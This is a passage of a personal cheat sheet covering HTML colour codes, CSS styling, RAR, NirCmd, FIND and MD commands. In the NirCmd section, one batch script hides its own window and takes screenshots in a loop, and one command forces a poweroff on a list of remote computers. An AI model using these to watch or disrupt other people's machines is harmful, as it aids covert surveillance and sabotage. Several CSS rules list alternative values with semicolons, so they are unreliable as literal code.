  1236. [HTML] HoneyDew(#F0FFF0);HotPink(#FF69B4);IndianRed(#CD5C5C);Indigo(#4B0082);Ivory(#FFFFF0);
  1237. [HTML] Khaki(#F0E68C);Lavender(#E6E6FA);LavenderBlush(#FFF0F5);LawnGreen(#7CFC00);
  1238. [HTML] LemonChiffon(#FFFACD);LightBlue(#ADD8E6);LightCoral(#F08080);LightCyan(#E0FFFF);
  1239. [HTML] LightGoldenRodYellow(#FAFAD2);LightGray(#D3D3D3);LightGreen(#90EE90);LightPink(#FFB6C1);
  1240. [HTML] LightSalmon(#FFA07A);LightSeaGreen(#20B2AA);LightSkyBlue(#87CEFA);LightSlateGray(#778899);
  1241. [HTML] LightSteelBlue(#B0C4DE);LightYellow(#FFFFE0);Lime(#00FF00);LimeGreen(#32CD32);
  1242. [HTML] Linen(#FAF0E6);Magenta(#FF00FF);Maroon(#800000);MediumAquaMarine(#66CDAA);
  1243. [HTML] MediumBlue(#0000CD);MediumOrchid(#BA55D3);MediumPurple(#9370DB);MediumSeaGreen(#3CB371);
  1244. [HTML] MediumSlateBlue(#7B68EE);MediumSpringGreen(#00FA9A);MediumTurquoise(#48D1CC);
  1245. [HTML] MediumVioletRed(#C71585);MidnightBlue(#191970);MintCream(#F5FFFA);MistyRose(#FFE4E1);
  1246. [HTML] Moccasin(#FFE4B5);NavajoWhite(#FFDEAD);Navy(#000080);OldLace(#FDF5E6);Olive(#808000);
  1247. [HTML] OliveDrab(#6B8E23);Orange(#FFA500);OrangeRed(#FF4500);Orchid(#DA70D6);PaleGoldenRod(#EEE8AA);
  1248. [HTML] PaleGreen(#98FB98);PaleTurquoise(#AFEEEE);PaleVioletRed(#DB7093);PapayaWhip(#FFEFD5);
  1249. [HTML] PeachPuff(#FFDAB9);Peru(#CD853F);Pink(#FFC0CB);Plum(#DDA0DD);PowderBlue(#B0E0E6);
  1250. [HTML] Purple(#800080);RebeccaPurple(#663399);Red(#FF0000);RosyBrown(#BC8F8F);RoyalBlue(#4169E1);
  1251. [HTML] SaddleBrown(#8B4513);Salmon(#FA8072);SandyBrown(#F4A460);SeaGreen(#2E8B57);SeaShell(#FFF5EE);
  1252. [HTML] Sienna(#A0522D);Silver(#C0C0C0);SkyBlue(#87CEEB);SlateBlue(#6A5ACD);SlateGray(#708090);
  1253. [HTML] SlateGrey(#708090);Snow(#FFFAFA);SpringGreen(#00FF7F);SteelBlue(#4682B4);Tan(#D2B48C);
  1254. [HTML] Teal(#008080);Thistle(#D8BFD8);Tomato(#FF6347);Turquoise(#40E0D0);Violet(#EE82EE);
  1255. [HTML] Wheat(#F5DEB3);White(#FFFFFF);WhiteSmoke(#F5F5F5);Yellow(#FFFF00);YellowGreen(#9ACD32);
  1256. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COLOR CODE END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1257. [HTML]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1258. [CSS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CSS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1259. [CSS] <link rel="stylesheet" href="https://www.w3schools.com/html/styles.css">
  1260. [CSS] <link rel="stylesheet" href="styles.css">
  1261. [CSS] /* This is a single-line comment */
  1262. [CSS] /* This is
  1263. [CSS] a multi-line
  1264. [CSS] comment */
  1265. [CSS] <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Audiowide">
  1266. [CSS] <style>
  1267. [CSS] body {font-family: "Audiowide", sans-serif;}
  1268. [CSS] h1.a {font-family: "Audiowide", sans-serif;}
  1269. [CSS] h1.b {font-family: "Sofia", sans-serif;}
  1270. [CSS] h1.c {font-family: "Trirong", serif;}
  1271. [CSS] body {
  1272. [CSS] font-family: "Sofia", sans-serif;
  1273. [CSS] font-size: 30px;
  1274. [CSS] text-shadow: 3px 3px 3px #ababab;
  1275. [CSS] }
  1276. [CSS] </style>
  1277. [CSS] <style>
  1278. [CSS] body {
  1279. [CSS] font-family: "Sofia", sans-serif;
  1280. [CSS] font-size: 30px;
  1281. [CSS] }
  1282. [CSS] </style>
  1283. [CSS] </head>
  1284. [CSS] <body>
  1285. [CSS] <h1 class="font-effect-fire">Sofia on Fire</h1>
  1286. [CSS] </body>
  1287. [CSS] <head>
  1288. [CSS] <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Sofia&effect=neon|outline|emboss|shadow-multiple">
  1289. [CSS] <style>
  1290. [CSS] body {
  1291. [CSS] font-family: "Sofia", sans-serif;
  1292. [CSS] font-size: 30px;
  1293. [CSS] }
  1294. [CSS] </style>
  1295. [CSS] </head>
  1296. [CSS] <body>
  1297. [CSS] <h1 class="font-effect-neon">Neon Effect</h1>
  1298. [CSS] <h1 class="font-effect-outline">Outline Effect</h1>
  1299. [CSS] <h1 class="font-effect-emboss">Emboss Effect</h1>
  1300. [CSS] <h1 class="font-effect-shadow-multiple">Multiple Shadow Effect</h1>
  1301. [CSS] </body>
  1302. [CSS] -------------------------------------------------------------
  1303. [CSS] 1 Use the HTML style attribute for inline styling
  1304. [CSS] <h1 style="color:blue;text-align:center;">Text</h1>
  1305. [CSS] <p style="color:red;">This is a paragraph.</p>
  1306. [CSS] 2 Use the HTML <style> element to define internal CSS
  1307. [CSS] 3 Use the HTML <link> element to refer to an external CSS file
  1308. [CSS] 4 Use the HTML <head> element to store <style> and <link> elements
  1309. [CSS] 5 Use the CSS color property for text colors
  1310. [CSS] 6 Use the CSS font-family property for text fonts
  1311. [CSS] 7 Use the CSS font-size property for text sizes
  1312. [CSS] 8 Use the CSS border property for borders
  1313. [CSS] 9 Use the CSS padding property for space inside the border
  1314. [CSS] 10 Use the CSS margin property for space outside the border
  1315. [CSS] ----------------------------------------------------------------
  1316. [CSS] "styles.css":
  1317. [CSS] body {
  1318. [CSS] background-color: powderblue;
  1319. [CSS] background-image: url("paper.gif");
  1320. [CSS] background-image: url("bgdesert.jpg");
  1321. [CSS] background-repeat: repeat-x; repeat-y; no-repeat;
  1322. [CSS] background-position: right top;
  1323. [CSS] background-attachment: fixed; scroll;
  1324. [CSS] }
  1325. [CSS] body {
  1326. [CSS] background: #ffffff url("img_tree.png") no-repeat right top;
  1327. [CSS] }
  1328. [CSS] h1 {
  1329. [CSS] background-color: green;
  1330. [CSS] opacity: 0.3; 1; 0.6;
  1331. [CSS] background-image: url("bgdesert.jpg");
  1332. [CSS] color: blue; /* Set text color to blue */
  1333. [CSS] font-family: verdana;Serif;Sans-serif;Monospace;Cursive;Fantasy
  1334. [CSS] font-style: normal; italic; oblique;
  1335. [CSS] font: italic small-caps bold 12px/30px Georgia, serif;
  1336. [CSS] font-weight: normal; bold;
  1337. [CSS] font-variant: normal; small-caps;
  1338. [CSS] font-size: 300%; 40px; 14px; 10vw; OR font-size: 2.5em; /* 40px/16=2.5em */
  1339. [CSS] margin-left: 20px;
  1340. [CSS] text-align: center; left; right; justify;
  1341. [CSS] text-decoration: none; overline; line-through; underline;
  1342. [CSS] text-transform: uppercase; lowercase; capitalize;
  1343. [CSS] text-indent: 50px;
  1344. [CSS] letter-spacing: 5px; -2px;
  1345. [CSS] line-height: 0.8; 1.8;
  1346. [CSS] word-spacing: 10px;-2px;
  1347. [CSS] white-space: nowrap;
  1348. [CSS] text-shadow: 2px 2px 5px red; OR text-shadow: 2px 2px red;
  1349. [CSS] }
  1350. [CSS] p {
  1351. [CSS] background-color: yellow;
  1352. [CSS] opacity: 0.3; 1; 0.6;
  1353. [CSS] background-image: url("bgdesert.jpg");
  1354. [CSS] color: red; white;
  1355. [CSS] font-family: courier; verdana;
  1356. [CSS] font-size: 160%; 20px;
  1357. [CSS] border: 2px solid powderblue;
  1358. [CSS] padding: 30px; OR margin: 50px;
  1359. [CSS] text-align: center; left; right; justify;
  1360. [CSS] text-decoration: none; overline; line-through; underline;
  1361. [CSS] text-transform: uppercase; lowercase; capitalize;
  1362. [CSS] text-indent: 50px;
  1363. [CSS] letter-spacing: 5px; -2px;
  1364. [CSS] line-height: 0.8; 1.8;
  1365. [CSS] word-spacing: 10px;-2px;
  1366. [CSS] white-space: nowrap;
  1367. [CSS] text-shadow: 2px 2px 5px red; OR text-shadow: 2px 2px red;
  1368. [CSS] }
  1369. [CSS] The CSS rule below will be applied to the HTML element with id="para1":
  1370. [CSS] #para1 {
  1371. [CSS] text-align: center;
  1372. [CSS] color: red;
  1373. [CSS] }
  1374. [CSS] In this example all HTML elements with class="center" will be red and center-aligned:
  1375. [CSS] .center {
  1376. [CSS] text-align: center;
  1377. [CSS] color: red;
  1378. [CSS] }
  1379. [CSS] div {
  1380. [CSS] background-color: green;
  1381. [CSS] opacity: 0.3; 1; 0.6;
  1382. [CSS] }
  1383. [CSS] In this example only <p> elements with class="center" will be red and center-aligned:
  1384. [CSS] p.center {
  1385. [CSS] text-align: center;
  1386. [CSS] color: red;
  1387. [CSS] } ; <p class="center large">This paragraph refers to two classes.</p>
  1388. [CSS] * {
  1389. [CSS] text-align: center;
  1390. [CSS] color: blue;
  1391. [CSS] }
  1392. [CSS] h1, h2, p {
  1393. [CSS] text-align: center;
  1394. [CSS] color: red;
  1395. [CSS] }
  1396. [CSS] p.dotted {border-style: dotted;}
  1397. [CSS] p.dashed {border-style: dashed;}
  1398. [CSS] p.solid {border-style: solid;}
  1399. [CSS] p.double {border-style: double;}
  1400. [CSS] p.groove {border-style: groove;}
  1401. [CSS] p.ridge {border-style: ridge;}
  1402. [CSS] p.inset {border-style: inset;}
  1403. [CSS] p.outset {border-style: outset;}
  1404. [CSS] p.none {border-style: none;}
  1405. [CSS] p.hidden {border-style: hidden;}
  1406. [CSS] p.mix {border-style: dotted dashed solid double;}
  1407. [CSS] p.one {
  1408. [CSS] border-radius: 5px;
  1409. [CSS] border-color: red;
  1410. [CSS] border-style: solid;
  1411. [CSS] border-width: 5px;
  1412. [CSS] border-width: 5px 20px; /* 5px top and bottom, 20px on the sides */
  1413. [CSS] }
  1414. [CSS] p.two {
  1415. [CSS] border-radius: 5px;
  1416. [CSS] border-color: red;
  1417. [CSS] border-style: solid;
  1418. [CSS] border-width: medium;
  1419. [CSS] border-width: 20px 5px; /* 20px top and bottom, 5px on the sides */
  1420. [CSS] }
  1421. [CSS] p.three {
  1422. [CSS] border-radius: 5px;
  1423. [CSS] border-color: red;
  1424. [CSS] border-style: dotted;
  1425. [CSS] border-width: 2px;
  1426. [CSS] border-width: 25px 10px 4px 35px; /* 25px top, 10px right, 4px bottom and 35px left */
  1427. [CSS] }
  1428. [CSS] p.four {
  1429. [CSS] border-style: dotted;
  1430. [CSS] border-width: thick;
  1431. [CSS] }
  1432. [CSS] p {
  1433. [CSS] border-top-style: dotted;
  1434. [CSS] border-right-style: solid;
  1435. [CSS] border-bottom-style: dotted;
  1436. [CSS] border-left-style: solid;
  1437. [CSS] }
  1438. [CSS] p {
  1439. [CSS] border: 5px solid red;
  1440. [CSS] }
  1441. [CSS] p {
  1442. [CSS] margin-top: 100px;
  1443. [CSS] margin-bottom: 100px;
  1444. [CSS] margin-right: 150px;
  1445. [CSS] margin-left: 80px;
  1446. [CSS] -----------------------
  1447. [CSS] margin: 0 0 50px 0;
  1448. [CSS] margin: 20px 0 0 0;
  1449. [CSS] }
  1450. [CSS] div {
  1451. [CSS] padding-top: 50px;
  1452. [CSS] padding-right: 30px;
  1453. [CSS] padding-bottom: 50px;
  1454. [CSS] padding-left: 80px;
  1455. [CSS] }
  1456. [CSS] div {
  1457. [CSS] padding: 25px 50px 75px 100px;
  1458. [CSS] }
  1459. [CSS] div {
  1460. [CSS] height: 200px;
  1461. [CSS] width: 50%;
  1462. [CSS] max-width: 500px; min-width: 500px;
  1463. [CSS] max-height: 500px; min-height: 500px;
  1464. [CSS] background-color: powderblue;
  1465. [CSS] }
  1466. [CSS] div {
  1467. [CSS] width: 300px;
  1468. [CSS] border: 15px solid green;
  1469. [CSS] padding: 50px;
  1470. [CSS] margin: 20px;
  1471. [CSS] }
  1472. [CSS] p.dotted {outline-style: dotted;}
  1473. [CSS] p.dashed {outline-style: dashed;}
  1474. [CSS] p.solid {outline-style: solid;}
  1475. [CSS] p.double {outline-style: double;}
  1476. [CSS] p.groove {outline-style: groove;}
  1477. [CSS] p.ridge {outline-style: ridge;}
  1478. [CSS] p.inset {outline-style: inset;}
  1479. [CSS] p.outset {outline-style: outset;}
  1480. [CSS] /* unvisited link */
  1481. [CSS] a:link {
  1482. [CSS] color: red;
  1483. [CSS] }
  1484. [CSS] /* visited link */
  1485. [CSS] a:visited {
  1486. [CSS] color: green;
  1487. [CSS] }
  1488. [CSS] /* mouse over link */
  1489. [CSS] a:hover {
  1490. [CSS] color: hotpink;
  1491. [CSS] }
  1492. [CSS] /* selected link */
  1493. [CSS] a:active {
  1494. [CSS] color: blue;
  1495. [CSS] }
  1496. [CSS] a:link, a:visited {
  1497. [CSS] background-color: #f44336;
  1498. [CSS] color: white;
  1499. [CSS] padding: 14px 25px;
  1500. [CSS] text-align: center;
  1501. [CSS] text-decoration: none;
  1502. [CSS] display: inline-block;
  1503. [CSS] }
  1504. [CSS] a:hover, a:active {
  1505. [CSS] background-color: red;
  1506. [CSS] }
  1507. [CSS] <span style="cursor: auto">auto</span><br>
  1508. [CSS] <span style="cursor: crosshair">crosshair</span><br>
  1509. [CSS] <span style="cursor: default">default</span><br>
  1510. [CSS] <span style="cursor: e-resize">e-resize</span><br>
  1511. [CSS] <span style="cursor: help">help</span><br>
  1512. [CSS] <span style="cursor: move">move</span><br>
  1513. [CSS] <span style="cursor: n-resize">n-resize</span><br>
  1514. [CSS] <span style="cursor: ne-resize">ne-resize</span><br>
  1515. [CSS] <span style="cursor: nw-resize">nw-resize</span><br>
  1516. [CSS] <span style="cursor: pointer">pointer</span><br>
  1517. [CSS] <span style="cursor: progress">progress</span><br>
  1518. [CSS] <span style="cursor: s-resize">s-resize</span><br>
  1519. [CSS] <span style="cursor: se-resize">se-resize</span><br>
  1520. [CSS] <span style="cursor: sw-resize">sw-resize</span><br>
  1521. [CSS] <span style="cursor: text">text</span><br>
  1522. [CSS] <span style="cursor: w-resize">w-resize</span><br>
  1523. [CSS] <span style="cursor: wait">wait</span>
  1524. [CSS] ul {
  1525. [CSS] list-style: square inside url("sqpurple.gif");
  1526. [CSS] }
  1527. [CSS] table, th, td {
  1528. [CSS] border: 1px solid black;
  1529. [CSS] }
  1530. [CSS] table {
  1531. [CSS] border-collapse: collapse;
  1532. [CSS] }
  1533. [CSS] table th, td {
  1534. [CSS] padding: 15px;
  1535. [CSS] text-align: left;
  1536. [CSS] border: 1px solid black;
  1537. [CSS] }
  1538. [CSS] #rcorners1 {
  1539. [CSS] border-radius: 25px;
  1540. [CSS] background: #73AD21;
  1541. [CSS] padding: 20px;
  1542. [CSS] width: 200px;
  1543. [CSS] height: 150px;
  1544. [CSS] }
  1545. [CSS] #rcorners2 {
  1546. [CSS] border-radius: 25px;
  1547. [CSS] border: 2px solid #73AD21;
  1548. [CSS] padding: 20px;
  1549. [CSS] width: 200px;
  1550. [CSS] height: 150px;
  1551. [CSS] }
  1552. [CSS] #rcorners3 {
  1553. [CSS] border-radius: 25px;
  1554. [CSS] background: url(paper.gif);
  1555. [CSS] background-position: left top;
  1556. [CSS] background-repeat: repeat;
  1557. [CSS] padding: 20px;
  1558. [CSS] width: 200px;
  1559. [CSS] height: 150px;
  1560. [CSS] }
  1561. [CSS] #rcorners1 {
  1562. [CSS] border-radius: 15px 50px 30px 5px;
  1563. [CSS] background: #73AD21;
  1564. [CSS] padding: 20px;
  1565. [CSS] width: 200px;
  1566. [CSS] height: 150px;
  1567. [CSS] }
  1568. [CSS] #rcorners2 {
  1569. [CSS] border-radius: 15px 50px 30px;
  1570. [CSS] background: #73AD21;
  1571. [CSS] padding: 20px;
  1572. [CSS] width: 200px;
  1573. [CSS] height: 150px;
  1574. [CSS] }
  1575. [CSS] #rcorners3 {
  1576. [CSS] border-radius: 15px 50px;
  1577. [CSS] background: #73AD21;
  1578. [CSS] padding: 20px;
  1579. [CSS] width: 200px;
  1580. [CSS] height: 150px;
  1581. [CSS] }
  1582. [CSS] #rcorners4 {
  1583. [CSS] border-radius: 15px;
  1584. [CSS] background: #73AD21;
  1585. [CSS] padding: 20px;
  1586. [CSS] width: 200px;
  1587. [CSS] height: 150px;
  1588. [CSS] }
  1589. [CSS] #borderimg {
  1590. [CSS] border: 10px solid transparent;
  1591. [CSS] padding: 15px;
  1592. [CSS] border-image: url(border.png) 30 round;
  1593. [CSS] }
  1594. [CSS] #borderimg {
  1595. [CSS] border: 10px solid transparent;
  1596. [CSS] padding: 15px;
  1597. [CSS] border-image: url(border.png) 30 stretch;
  1598. [CSS] }
  1599. [CSS] #example1 {
  1600. [CSS] background-image: url(img_flwr.gif), url(paper.gif);
  1601. [CSS] background-position: right bottom, left top;
  1602. [CSS] background-repeat: no-repeat, repeat;
  1603. [CSS] }
  1604. [CSS] #div1 {
  1605. [CSS] background: url(img_flower.jpg);
  1606. [CSS] background-size: 100px 80px;
  1607. [CSS] background-repeat: no-repeat;
  1608. [CSS] }
  1609. [CSS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CSS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1610. [RAR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-RAR-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1611. [RAR] Usage: RAR <command> -<switch 1> -<switch N> <archive> <files...>
  1612. [RAR] <@listfiles...> <path_to_extract\>
  1613. [RAR] %WinDir%\RAr.exe a NSK.rar "D:\latest data"
  1614. [RAR] %WinDir%\RAr.exe a help *.hlp (add all *.hlp files from the current folder to the archive help.rar)
  1615. [RAR] [RAR]%WinDir%\RAr.exe a -r -v362 -s -sfx -rr save
  1616. [RAR] %WinDir%\RAr.exe a -pZaBaToAd -r secret games\*.*
  1617. [RAR]%WinDir%\RAr.exe a NSK.rar d:\files -p123 -p- -k
  1618. [RAR] ----------------------------------------------------------------------
  1619. [RAR] Usage: RAR & UNRAR <command> -<switch 1> -<switch N> <archive> <files...>
  1620. [RAR] <@listfiles...> <path_to_extract\>
  1621. [RAR] %WinDir%\UnRAR.exe x NSK.rar D:\data\
  1622.  
  1623. [RAR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-RAR END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1624. [NIRCMD] :-=-=-=-=-=-=-=-=-=-==-=-=-=-NIRCMD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1625. [NIRCMD] @ECHO OFF
  1626. [NIRCMD] COLOR 1B
  1627. [NIRCMD] REM setlocal enabledelayedexpansion
  1628. [NIRCMD] set /p "sec=Screen Capture Time PerSec:
  1629. [NIRCMD] (
  1630. [NIRCMD] nircmd.exe win hide ititle "cmd.exe"
  1631. [NIRCMD] :top
  1632. [NIRCMD] timeout /t %sec%
  1633. [NIRCMD] nircmd.exe savescreenshot "C:\Users\%USERNAME%\Desktop\Screen.jpg"
  1634. [NIRCMD] goto top
  1635. [NIRCMD] )
  1636. [NIRCMD] -------------------------------------------------------------------
  1637. [NIRCMD] nircmd.exe savescreenshot "C:\Users\%USERNAME%\Desktop\Screen%%random%%.jpg"
  1638. [NIRCMD] nircmd.exe shellcopy "c:\temp\*.*" "d:\temp"
  1639. [NIRCMD] nircmd.exe shellcopy "c:\temp\*.*" "d:\temp" yestoall noerrorui
  1640. [NIRCMD] nircmd.exe filldelete "c:\temp\*.*"
  1641. [NIRCMD] nircmd.exe filldelete "c:\temp\myfile.dat"
  1642. [NIRCMD] nircmd.exe speak text ~$clipboard$
  1643. [NIRCMD] nircmd.exe speak text "Please visit the Web site of NirSoft at http://www.nirsoft.net" 2 80
  1644. [NIRCMD] nircmd.exe speak file "c:\temp\speak1.txt"
  1645. [NIRCMD] nircmd.exe speak file "c:\temp\speak1.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  1646. [NIRCMD] nircmd.exe loop 3 2000 speak text "Call Number ~$loopcount$"
  1647. [NIRCMD] nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$loopcount$.png
  1648. [NIRCMD] nircmd.exe savescreenshot "c:\temp\shot.png"
  1649. [NIRCMD] nircmd.exe savescreenshot "c:\temp\shot.png" 50 50 300 200
  1650. [NIRCMD] nircmd.exe savescreenshot *clipboard* 150 150 400 400
  1651. [NIRCMD] nircmd.exe savescreenshotwin "c:\temp\win.png"
  1652. [NIRCMD] nircmd.exe savescreenshotwin *clipboard*
  1653. [NIRCMD] nircmd.exe cmdwait 1000 monitor off
  1654. [NIRCMD] nircmd.exe infobox "This is a message box !" "message"
  1655. [NIRCMD] nircmd.exe folder.appdata
  1656. [NIRCMD] nircmd.exe folder.startup
  1657. [NIRCMD] nircmd.exe beep 500 2000
  1658. [NIRCMD] nircmd.exe wait 1000
  1659. [NIRCMD] nircmd.exe wait 500
  1660. [NIRCMD] nircmd.exe sendkeypress ctrl+shift+esc
  1661. [NIRCMD] nircmd.exe sendkeypress Ctrl+printscreen
  1662. [NIRCMD] nircmd.exe convertimage "c:\temp\test1.gif" "c:\temp\test1.png"
  1663. [NIRCMD] nircmd.exe convertimage "c:\temp\test1.jpg" "c:\temp\test1.gif"
  1664. [NIRCMD] nircmd.exe convertimages "c:\temp\a*.gif" .png
  1665. [NIRCMD] nircmd.exe convertimages "c:\temp\*.jpg" .gif
  1666. [NIRCMD] nircmd.exe emptybin
  1667. [NIRCMD] nircmd.exe speak text ~$clipboard$
  1668. [NIRCMD] nircmd.exe speak file "D:\speak.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  1669. [NIRCMD] nircmd.exe cdrom open j:
  1670. [NIRCMD] nircmd.exe cdrom close y:
  1671. [NIRCMD] nircmd.exe mutesysvolume 1
  1672. [NIRCMD] nircmd.exe mutesysvolume 0
  1673. [NIRCMD] nircmd.exe mutesysvolume 2
  1674. [NIRCMD] nircmd.exe cmdshortcut "~$folder.desktop$" "Switch Volume" mutesysvolume 2
  1675. [NIRCMD] nircmd.exe changesysvolume 2000
  1676. [NIRCMD] nircmd.exe changesysvolume -5000
  1677. [NIRCMD] nircmd.exe setsysvolume 65535
  1678. [NIRCMD] nircmd.exe monitor off
  1679. [NIRCMD] nircmd.exe screensaver
  1680. [NIRCMD] nircmd.exe exitwin poweroff
  1681. [NIRCMD] nircmd.exe multiremote copy "c:\temp\computers.txt" exitwin poweroff force
  1682. [NIRCMD] nircmd.exe rasdial "My Internet"
  1683. [NIRCMD] nircmd.exe rashangup "My Internet"
  1684. [NIRCMD] nircmd.exe win trans ititle "internet explorer" 192
  1685. [NIRCMD] nircmd.exe win min class "IEFrame"
  1686. [NIRCMD] nircmd.exe win close class "IEFrame"
  1687. [NIRCMD] nircmd.exe win close class "CabinetWClass"
  1688. [NIRCMD] nircmd.exe win hide class "IEFrame"
  1689. [NIRCMD] nircmd.exe win show class "IEFrame"
  1690. [NIRCMD] nircmd.exe win center alltop
  1691. [NIRCMD] nircmd.exe win -style title "my computer" 0x00C00000
  1692. [NIRCMD] nircmd.exe win +style title "my computer" 0x00C00000
  1693. [NIRCMD] nircmd win +exstyle title "my computer" 0x00400000
  1694. [NIRCMD] nircmd win child title "my computer" +exstyle all 0x00400000
  1695. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Close All IE" win close class "IEFrame"
  1696. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Hide All IE" win hide class "IEFrame"
  1697. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Show All IE" win show class "IEFrame"
  1698. [NIRCMD] nircmd.exe win settopmost title "Calculator" 1
  1699. [NIRCMD] nircmd.exe win settopmost title "Calculator" 0
  1700. [NIRCMD] nircmd.exe shortcut "f:\winnt\system32\calc.exe" "~$folder.programs$\Calculators" "Windows Calculator"
  1701. [NIRCMD] nircmd.exe win hide class progman
  1702. [NIRCMD] nircmd.exe win show class progman
  1703. [NIRCMD] nircmd.exe killprocess iexplore.exe
  1704. [NIRCMD] nircmd.exe urlshortcut "http://www.nirsoft.net" "~$folder.desktop$" "NirSoft"
  1705. [NIRCMD] nircmd.exe setdisplay 800 600 24
  1706. [NIRCMD] nircmd.exe execmd copy "~$folder.desktop$\*.lnk" f:\temp\desktop
  1707. [NIRCMD] nircmd regedit "~$clipboard$"
  1708. [NIRCMD] nircmd.exe clipboard set ~$folder.desktop$
  1709. [NIRCMD] nircmd.exe clipboard set ~$folder.start_menu$
  1710. [NIRCMD] nircmd.exe clipboard readfile "c:\My Files\info1.txt"
  1711. [NIRCMD] nircmd.exe clipboard addfile "c:\My Files\info1.txt"
  1712. [NIRCMD] nircmd.exe clipboard clear
  1713. [NIRCMD] nircmd.exe paramsfile "c:\temp\folders.txt" "" "" execmd md ~$fparam.1$
  1714. [NIRCMD] nircmd.exe dlg "" "" click yes
  1715. [NIRCMD] nircmd.exe cmdwait 2000 savescreenshot "f:\temp\shot.png"
  1716. [NIRCMD] nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$currdate.MM_dd_yyyy$-~$currtime.HH_mm_ss$.png
  1717. [NIRCMD] nircmd.exe elevate notepad.exe
  1718. [NIRCMD] nircmd.exe elevate notepad.exe C:\Windows\System32\Drivers\etc\HOSTS
  1719. [NIRCMD] nircmd.exe elevate "c:\program files\my software\abc.exe"
  1720. [NIRCMD] nircmd.exe runas admin1 Password1 "F:\Program Files\Mozilla Firefox\firefox.exe"
  1721. [NIRCMD] nircmd.exe runas Domain01\user01 myp234Jk c:\temp\myprogram.exe
  1722. [NIRCMD] nircmd.exe runas user01@domain.com Nm1923a "c:\temp\myprogram.exe" -a -k
  1723. [NIRCMD] nircmd.exe mediaplay 10000 "c:\temp\1.mp3"
  1724. [NIRCMD] nircmd.exe mediaplay 180000 "c:\my files\1.wav"
  1725. [NIRCMD] nircmd.exe trayballoon "Hello" "This is a test..." "shell32.dll,22" 15000
  1726. [NIRCMD] nircmd.exe trayballoon "Hello" "This is the text that will be appear inside the balloon " "shell32.dll,-154" 10000
  1727. [NIRCMD] nircmd.exe runinteractivecmd savescreenshot "c:\temp\screenshot1.png"
  1728. [NIRCMD] nircmd.exe runinteractive c:\windows\system32\taskmgr.exe
  1729. [NIRCMD] nircmd.exe trayballoon "Hello" "This is the text that will be appear inside the balloon \temp\icon1.ico" 10000
  1730. [NIRCMD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NIRCMD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1731. [FIND] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FIND-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1732. [FIND] [/V] [/C] [/N] [/I] [/OFF[LINE]] "string" [[drive:][path]filename[ ...]]
  1733. [FIND] /V Displays all lines NOT containing the specified string.
  1734. [FIND] /C Displays only the count of lines containing the string.
  1735. [FIND] /N Displays line numbers with the displayed lines.
  1736. [FIND] /I Ignores the case of characters when searching for the string.
  1737. [FIND] /OFF[LINE] Do not skip files with offline attribute set.
  1738. [FIND] "string" Specifies the text string to find.
  1739. [FIND] [drive:][path]filename Specifies a file or files to search.
  1740. [FIND] EXMPLES:- FIND "WORD" *.txt
  1741. [FIND] FIND /V /C "" D:\Samle.txt OR *.txt
  1742. [FIND] FIND /I "WORD" *Files*.txt
  1743. [FIND] FIND /N /I "TEXT" *.txt
  1744. [FIND] TYPE D:\Sample.txt | FIND " /V /C
  1745. [FIND] ----------------------------------------------------
  1746. [FIND] FINDSTR [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/N] [/M] [/O] [/P] [/F:file]
  1747. [FIND] [/C:string] [/G:file] [/D:dir list] [/A:color attributes] [/OFF[LINE]]
  1748. [FIND] strings [[drive:][path]filename[ ...]]
  1749. [FIND] /B Matches pattern if at the beginning of a line.
  1750. [FIND] /E Matches pattern if at the end of a line.
  1751. [FIND] /L Uses search strings literally.
  1752. [FIND] /R Uses search strings as regular expressions.
  1753. [FIND] /S Searches for matching files in the current directory and all
  1754. [FIND] subdirectories.
  1755. [FIND] /I Specifies that the search is not to be case-sensitive.
  1756. [FIND] /X Prints lines that match exactly.
  1757. [FIND] /V Prints only lines that do not contain a match.
  1758. [FIND] /N Prints the line number before each line that matches.
  1759. [FIND] /M Prints only the filename if a file contains a match.
  1760. [FIND] /O Prints character offset before each matching line.
  1761. [FIND] /P Skip files with non-printable characters.
  1762. [FIND] /OFF[LINE] Do not skip files with offline attribute set.
  1763. [FIND] /A:attr Specifies color attribute with two hex digits. See "color / "
  1764. [FIND] /F:file Reads file list from the specified file(/ stands for console).
  1765. [FIND] /C:string Uses specified string as a literal search string.
  1766. [FIND] /G:file Gets search strings from the specified file(/ stands for console).
  1767. [FIND] /D:dir Search a semicolon delimited list of directories
  1768. [FIND] strings Text to be searched for.
  1769. [FIND] [drive:][path]filename Specifies a file or files to search.
  1770. [FIND] EXMPLES:-
  1771. [FIND] FINDSTR "WORD1 WORD2 WORD3...." Sample.txt OR *.txt
  1772. [FIND] FINDSTR "APPLE BALL cat...." Sample.txt OR *.txt
  1773. [FIND] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FIND END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1774. [MD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-MD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1775. [MD] MKDIR [drive:]path
  1776. [MD] MD [drive:]path
  1777. [MD] MD test ; md C:\test ; md C:\test ; mkdir \a\b\c
  1778. [MD] MD user1 user2 user3 ; md "my example directory"
